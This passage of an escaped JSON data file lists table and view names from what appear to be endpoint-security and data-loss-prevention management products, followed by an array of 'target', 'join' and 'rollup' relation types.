groupproperty\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MCA\\\",\\r\\n\\t\\t\\t\\\"USAGE_METERING_ALF_VIEW\\\",\\r\\n\\t\\t\\t\\\"FW_Rule_Application\\\",\\r\\n\\t\\t\\t\\\"ePOCompute
rProperties\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMARSERVER\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMATD\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_EPOAGENT\\\",\\r\\n\\t\\t\\t\\\"epoevents\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesASSESSMENT\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_PREVENT\\\",\\r\\n\\t\\t\\t\\\"MDCC_VM_PRODUCTS\\\",\\r\\n\\t\\t\\t\\\"EntitlementView\\\",\\r\\n\\t\\t\\t\\\"gridthreatlist\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentResolutions_Rollup\\\",\\r\\n\\t\\t\\t\\\"DXLBrokerCustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOEvents\\\",\\r\\n\\t\\t\\t\\\"tagAssignmentList\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentExport\\\",\\r\\n\\t\\t\\t\\\"MDCC_VOLUME_PROPERTY\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesEPOAGENT\\\",\\r\\n\\t\\t\\t\\\"EPOTaskAppliedTasks\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DXLCLIENT\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRemovableStorage\\\",\\r\\n\\t\\t\\t\\\"threateventlist\\\",\\r\\n\\t\\t\\t\\\"DXLClientCustomProps\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MAR\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_DLPPS\\\",\\r\\n\\t\\t\\t\\\"ENSRollup_FW_CustomProps\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_hyperVSquid\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_WEBCONTROL\\\",\\r\\n\\t\\t\\t\\\"eventlist4\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"MDCC_DPC_VM_VIEW\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_UDLP_DISCOVERY\\\",\\r\\n\\t\\t\\t\\\"EPORollup_Events\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm_Archive\\\",\\r\\n\\t\\t\\t\\\"ENSRollup_WP_CustomProps\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationDatabaseView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint_Rollup\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_ASSESSMENT\\\",\\r\\n\\t\\t\\t\\\"UDL
P_EPD_LatestFileSysDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"AM_EndpointTechnologyStatus_View\\\",\\r\\n\\t\\t\\t\\\"ClientUICurrentLockOutStatus_View\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied\\\",\\r\\n\\t\\t\\t\\\"MARHostCacheItem\\\",\\r\\n\\t\\t\\t\\\"MARCacheInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice_Rollup\\\",\\r\\n\\t\\t\\t\\\"ENSRollup_AM_CustomProps\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesMVEDR\\\",\\r\\n\\t\\t\\t\\\"issueCount\\\",\\r\\n\\t\\t\\t\\\"workloaddetailKubernetes\\\",\\r\\n\\t\\t\\t\\\"OrionTaskLogSubtaskMessage\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesDXLCLIENT\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationSharePointView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals_Rollup\\\",\\r\\n\\t\\t\\t\\\"vminfovcenter\\\",\\r\\n\\t\\t\\t\\\"threatfilter\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud_Rollup\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll_Capture\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed_Archive\\\",\\r\\n\\t\\t\\t\\\"EpoComplianceHistory\\\",\\r\\n\\t\\t\\t\\\"EPOProdPropsView_MARAGG\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers\\\",\\r\\n\\t\\t\\t\\\"MDCC_CLOUD_VM_PROPS_VW_kubernetesSquid\\\",\\r\\n\\t\\t\\t\\\"EPORollup_ProductPropertiesUDLP_DISCOVERY\\\",\\r\\n\\t\\t\\t\\\"account\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentResolutions\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon\\\",\\r\\n\\t\\t\\t\\\"U
DLP_EPOTagsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalLabelInfoView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseManagement\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserPropertiesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EP_Scans\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentsQueries_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventComputers\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentClassifications\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentScan\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserGroupsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice\\\",\\r\\n\\t\\t\\t\\\"UDLP_ProductDistributionAllView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAdditional_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOSysTreePathsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFileLocation_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentLabelsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryServersView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentLabelsView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_ProductDistributionView\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_GeneratedKey_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentClassification_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileInfoQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOProductPropertiesAllView\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseResolution\\\",\\r\\n\\t\\t\\t\\\"UDLP_OperationalEvidences_Archive\\\",\\r\\n\\
t\\t\\t\\\"UDLP_CaseToLabels\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRuleEvidencesQueriesView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_EvidenceReplicationFailed\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventPolicyInfo\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryFailure\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentToLabel\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentDevice_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentLabelsView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRemovableStorage\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRemovableStorage_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummary_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentLabelsView_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers_Destination\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NdlpAppliance_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentStatuses\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NdlpAppliance\\\",\\r\\n\\t\\t\\t\\\"UDLP_RulesPerUser\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_116_ApplyRMPolicyFailed_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentClassification\\\",\\r\\n\\t\\t\\t\\\"UDLP_ExportEventDetails\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentApplications\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentExport\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_CaseStatus\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmail\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_Incidents\\\",\\r\\n\\t\\t\\t\\\"UDLP_Dis
coveryIncidentClassifications_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestFileSysDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_407_ExceededMem_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestEmailDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentWebPost_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryCommon_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestEmailDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentsQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operationals\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentClassification_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserEmailStorageDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentRuleEvidencesQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserGroupsView_Destination\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentToLabel_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_NetworkDiscoveryAudit\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncidentRules\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentDiscoverySummaryForMaReport\\\",\\r\\n\\t\\t\\t\\\"UDLP_ComputersToPoliciesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryIncident_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNdlpAppliance_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentRules_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentMobileDevice\\\",\\r\\n\\t\\t\\t\\\"UDLP_UserFileSystemDiscoveryView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCloud_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipients\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPOProductPropertiesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_109_PolicyApplied_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkComm\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryFileClassificationQueriesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentEmailRecipientsAll_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_IncidentEvidences\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentPrint\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_402_Eviden
ceReplicationFailed_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EventUsers\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentNetworkShare_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_401_UserInSafeMode_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_EPD_LatestFileSysDiscoveryClassificationView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_405_ReleaseCodeLocked_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_DiscoveryScansView\\\",\\r\\n\\t\\t\\t\\\"UDLP_IncidentCaptureSearch_Archive\\\",\\r\\n\\t\\t\\t\\\"UDLP_ComputerPropertiesView\\\",\\r\\n\\t\\t\\t\\\"UDLP_Operational_112_AgentEnteredBypass_Archive\\\",\\r\\n\\t\\t\\t\\\"file_path\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_summaryFilter\\\",\\r\\n\\t\\t\\t\\\"file_parent\\\",\\r\\n\\t\\t\\t\\\"file_trust_level_count_summary\\\",\\r\\n\\t\\t\\t\\\"certificate_first_ref\\\",\\r\\n\\t\\t\\t\\\"associated_certificate_rep_enterprise\\\",\\r\\n\\t\\t\\t\\\"certificate\\\",\\r\\n\\t\\t\\t\\\"certificateJoined\\\",\\r\\n\\t\\t\\t\\\"file_rep_mwg\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_summary\\\",\\r\\n\\t\\t\\t\\\"associated_certificate_rep_gti\\\",\\r\\n\\t\\t\\t\\\"file\\\",\\r\\n\\t\\t\\t\\\"file_rep_summaryFilter\\\",\\r\\n\\t\\t\\t\\\"agent_new_certificate_summary\\\",\\r\\n\\t\\t\\t\\\"fileJoined\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_enterprise_parent\\\",\\r\\n\\t\\t\\t\\\"agent_new_file_summary\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_gti\\\",\\r\\n\\t\\t\\t\\\"file_rep_gti\\\",\\r\\n\\t\\t\\t\\\"certificate_trust_level_count_summary\\\",\\r\\n\\t\\t\\t\\\"file_rep_summary\\\",\\r\\n\\t\\t\\t\\\"certificate_rep\\\",\\r\\n\\t\\t\\t\\\"file_name\\\",\\r\\n\\t\\t\\t\\\"file_rep_enterprise\\\",\\r\\n\\t\\t\\t\\\"certificate_rep_enterprise\\\",\\r\\n\\t\\t\\t\\\"file_rep\\\",\\r\\n\\t\\t\\t\\\"file_rep_ctd\\\",\\r\\n\\t\\t\\t\\\"cleanup_trending_summary\\\",\\r\\n\\t\\t\\t\\\"file_rep_atd\\\",\\r\\n\\t\\t\\t\\\"file_first_ref\\\"\\r\\n\\t\\t]\"",
    "type": "\"[\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n
\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\
t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"Left 
join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join